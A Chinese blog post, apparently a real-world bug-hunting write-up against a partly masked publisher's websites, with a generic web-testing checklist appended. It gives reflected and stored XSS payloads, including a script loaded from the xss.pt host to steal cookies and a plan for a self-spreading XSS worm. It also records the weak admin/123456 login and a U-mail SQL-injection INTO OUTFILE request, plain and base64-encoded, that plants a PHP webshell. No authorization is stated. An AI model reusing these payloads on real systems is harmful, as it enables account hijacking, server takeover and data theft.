实战挖掘某出版社漏洞集合

0x00 前言

之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。

0x01 主站XSS

主页搜索框,发现是get传参

http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E

个人中心XSS可打Cookie

基本资料,昵称处限制了长度,直接插入payload

<sCRiPt sRC=http://xss.pt/xxxx></sCrIpT>

下面这张图截错了,修改了昵称后就没法修改了所以没有新图可截,直接在昵称插入payload保存即可

访问个人中心
昵称处已经空了

http://www.*****.com/blog/2342589/taokejian.htm


结合前台搜索框get型xss,iframe框架隐藏嵌入我的主页链接到搜索框中,传播即可造成xss蠕虫

0x02 分站XSS

http://zy.*****.com/sp/getp****p.do

搜索框 弹一下 没啥卵用

0x03 某资源管理平台弱密码

弱口令就进去了

http://x***ewm.*****.com/index        admin   123456

0x04 邮箱系统SQL注入&Getshell&远程代码执行

U-mail挺老的邮件系统了,很多洞,经过测试,通过注入into outfile拿到shell

http://mail.*****.com/

1. 信息泄露

http://mail.*****.com/webmail/customer/autoresp.php
路径泄露:D:\umail\WorldClient\html\userapply.php
info:http://mail.*****.com//webmail/info.php

2. 注入写木马测试

aa’ union select 1,2,3,4,5,6,'<?php echo 
phpinfo();?>’,8,9,10,11,12,13,14 into outfile 
‘D:/umail/WorldClient/html/src.php’#

上面语句base64转码

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

访问:

http://mail.*****.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

3. getshell

http://mail.*****.com/webmail/sss.php        密码g

win2008  network service 可秒system,就到这了没再继续了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web漏洞挖掘是一项重要的安全工作,可以帮助发现和修复Web应用程序中存在的潜在漏洞。以下是一些实战中常用的Web漏洞挖掘方法: 1. 信息收集:收集关于目标应用程序的信息,包括架构、技术栈、可用端点等。 2. 扫描和映射:使用自动化工具(如Burp Suite、Nessus)扫描目标应用程序,识别潜在的漏洞点,并进行应用程序映射。 3. 注入攻击:通过输入恶意数据,检查应用程序是否容易受到SQL注入、命令注入或其他注入类攻击。 4. 跨站脚本攻击(XSS):尝试在用户输入点或其他可注入脚本的位置插入恶意脚本,以执行未经授权的操作。 5. 跨站请求伪造(CSRF):检查应用程序是否存在缺乏适当身份验证和授权机制,以防止来自恶意网站的伪造请求。 6. 文件包含漏洞:检查应用程序是否存在可用于包含远程文件的漏洞,从而可能导致代码执行或敏感信息泄露。 7. 不安全的直接对象引用(IDOR):尝试直接访问应用程序中的资源,绕过身份验证和授权检查,查看是否存在未受保护的敏感信息。 8. 服务器配置错误:检查目标服务器的配置文件,查看是否存在敏感信息泄露、目录列表、不安全的HTTP方法等问题。 9. 逻辑漏洞:检查应用程序的业务逻辑,寻找可能导致未经授权的访问或敏感信息泄露的逻辑错误。 10. 漏洞利用和验证:对发现的漏洞进行进一步测试和验证,并编写详细的报告,以便开发人员能够修复这些漏洞。 请注意,进行Web漏洞挖掘需要合法授权和合规性,任何未经授权的活动都是违法的。建议在进行漏洞挖掘之前,与相关业主或法定所有者协商和获得明确的许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值